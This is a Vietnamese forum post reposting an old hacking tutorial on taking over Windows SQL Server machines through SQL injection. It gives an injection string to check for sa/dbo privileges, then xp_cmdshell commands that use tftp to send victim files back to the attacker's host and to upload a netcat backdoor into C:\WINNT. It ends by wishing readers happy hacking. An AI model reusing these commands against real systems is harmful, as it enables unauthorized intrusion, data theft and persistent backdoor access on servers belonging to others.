»-(¯`v´¯)-»Diễn Đàn Trường Công Nghệ Thông Tin Thái Nguyên»-(¯`v´¯)-»

.:hix lâu không làm web.nên giờ lười làm quá.dùng tạm cái Forum việt vậy.chủ yếu là chất lượng Những bài viết thôi đúng không.thật THà là nói hết không giấu diếm nhưng học xong cấm nghịch bậy..http://guichonguoiay.net.tf web mình đó RỖI VÀO CHơi Ha.hjhj:.
 
Trang ChínhPortalCalendarGalleryTrợ giúpTìm kiếmThành viênNhómĐăng kýĐăng Nhập
Thông Tin Cực Sock Cho Những Ai Nghiện Game Audition Của Thái Nguyên.Sau Một Thời Gian Tìm Hiểu Mà Nhờ Mấy Anh Ở forum ClbGame Mình Đã Cài THành Công Bản Audition Offline THái Nguyên.Sắp Tới Mình Sẽ Đưa Lên Online.Các Bạn Muốn Chơi Game Và Muốn Sở Hữu Những Bộ Đồ Đẹp Nhất Không Còn Chần Chừ Gì Nữa Mà Không Click Chuột Để Truy Cập Trang Web wWw.AuTn.tk Để Download Và Thưởng thức

Share | 
 

 Hack server bị SQL Injection

Go down 
Tác giảThông điệp
Admin
Admin


Tổng số bài gửi : 136
Join date : 13/03/2010

Bài gửiTiêu đề: Hack server bị SQL Injection   Tue Mar 16, 2010 9:16 pm

Hack server bị SQL Injection



Author : Windak ( thx Mask_nbt )
Date : 2002

1)Tỷ lệ thành công 80%:

Điều kiện server phải là winnt và user dùng để inject là user có quyền dùng xp_cmdshell (sa, dbo)

Để check bạn có thể làm sau đây trên inject link

[injection link]’ %2b convert (int,(system_user())—

Nếu KQ là ‘sa’ hoặc ‘dbo’ có lẽ bạn có thể tấn công được rồi.

Nếu bạn có ‘sa’ hoặc ‘dbo’ nhưng mà admin lại không cho sử dụng cmdshell bạn hãy bật nó lên (bật thế nào tự tìm hiểu nhé )

Lưu ý : bạn sẽ chỉ hack được vào server chứa database của nó thôi (nhiều khi đặt database chung với host )

Các tool cần thiết : <-- tự tìm download

tftpd32 , backdoor

+++Một vài kinh nghiệm hack, biết lệnh DOS và một chút hiểu biết về network

2) Từng bước tiếp cận

a)Các khái niệm:

Lưu ý : Cách hack này của tôi không phải là một chung nhất, bởi vì còn rất nhiều cách khác, cách này của tôi hack thông qua giao thức TFTP.



Nói sơ về giao thức TFTP :

Đó là một giao thức truyền file server<->client . Nó hoạt động tương tự như FTP nhưng đơn giản hơn nhiều , thông qua port 69, và một ưu điểm, nó không cần password (đây là điều quan trọng để ta hack)



Vào DOS gõ tftp /? -> Bạn sẽ được cú pháp của nó như sau :

TFTP [-i] host PUT || GET filename [vị trí file muốn gửi đến]

-i : nếu bạn cần truyền một file dạng binary hãy sử dụng nó

host : IP của máy server

PUT : nếu bạn muốn send file

GET : nếu bạn muốn lấy file

Ví dụ về một lệnh tftp :

Tftp –i xxx.xxx.xxx.xxx PUT netcat.exe C:\nc.exe

Sẽ lấy file netcat.exe trên máy server (máy có IP xxx….) và chuyển vào C:\nc.exe trên máy client (máy đã gõ lệnh trên)



Bây giờ ta sẽ test trực tiếp trên localhost. bạn hãy mở tftpd32 lên để biến máy mình thành một server tftp (lưu ý phải tắt hết firewall giao thức mới thực hiện tốt)

Trong tftpd32 có phần BASE directory mặc định là [path to]\tftpd32e, nó sẽ là thư mục đặt các file up hoặc download của bạn khi thực hiện trao đổi file với client (vì bạn là server) (bạn có thể change nếu thích).

Trong bài này tôi dùng [link] thay cho link các bạn inject, hãy chỉnh lại cho phù hợp để run exec (thêm (‘), ( nếu cần )

Và dùng <IP> để thay cho Ip của các bạn (nó sẽ hiển thị khi các bạn bật tftpd32)

Tấn công thực sự:

-------------------------------BEGIN----------------------------------

Command1 : RUN COMMAND DOS trên máy victim :



[link] exec master..xp_cmdshell ‘[command]’



Command 2 : DOWNLOAD FILE từ máy victim

[link] exec master..xp_cmdshell ‘tftp <IP> PUT [path][filecandown]’



Ví dụ : Lấy Ip máy victim :

(1)[link] exec master..xp_cmdshell ‘ipconfig > a.txt’

(2)[link] exec master..xp_cmdshell ‘tftp <IP> PUT a.txt’

----Giải thích :

(1) : run lệnh này : ipconfig >a.txt <=> tạo file a.txt với nội dung là kết quả của lệnh ipconfig

(2) : run tftp <IP> PUT a.txt <=> chuyển file a.txt với nội dung vừa tạo --> server (máy chúng ta )



Command3 : UPLOAD BACKDOOR lên máy victim :

[link] exec master..xp_cmdshell ‘tftp [–i] <IP> GET backdoor [path muon backdoor được đặt]’



ví dụ : upload netcat vào C:\WINNT:

[link] exec master..xp_cmdshell ‘tftp –i <IP> GET nc.exe C:\WINNT\nx.exe’

----------------------------------END------------------------------



3) Kết:

Như vậy chúng ta đã biết cách run command (bạn có thể run file exe ) , biết down, up file, hầu như đã làm chủ được server rồi đấy . Còn hack nhanh hay chậm, hiệu quả bao nhiêu là do bạn .Chúc hack vui.
Windak .
----------
Lâu rùi nhưng hay .
Về Đầu Trang Go down
Xem lý lịch thành viên http://itcu.forumvi.com
 
Hack server bị SQL Injection
Về Đầu Trang 
Trang 1 trong tổng số 1 trang

Permissions in this forum:Bạn không có quyền trả lời bài viết
»-(¯`v´¯)-»Diễn Đàn Trường Công Nghệ Thông Tin Thái Nguyên»-(¯`v´¯)-» :: Phận Làm Trai Gõ Phím Bình Thiên Hạ--Chí Anh Hùng Click Chuột Định Giang Sơn :: Những điều cơ bản để hack một trang web-
Chuyển đến